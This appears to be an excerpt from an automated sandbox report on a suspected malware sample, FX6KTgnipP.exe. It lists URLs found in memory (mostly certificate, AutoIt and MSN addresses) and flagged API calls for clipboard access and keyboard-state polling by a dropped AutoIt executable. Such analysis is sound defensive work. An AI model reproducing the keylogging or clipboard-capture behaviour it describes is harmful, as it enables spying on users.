                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: explorer.exe, 00000020.00000000.3696594073.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000020.00000000.3696594073.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000020.00000000.3696594073.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: explorer.exe, 00000020.00000002.3831910075.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3681722704.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3695089106.00000000082D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000000.1685361958.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2328145879.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe, 00000015.00000000.1940668034.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
                Source: explorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
                Source: explorer.exe, 00000020.00000002.3833424525.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
                Source: explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
                Source: explorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
                Source: explorer.exe, 00000020.00000002.3828546471.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000020.00000000.3696594073.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                Source: explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
                Source: explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_008CF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_008CF6C7
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_003AF6C7
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_008CF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,7_2_008BA54A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008E9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_008E9ED5
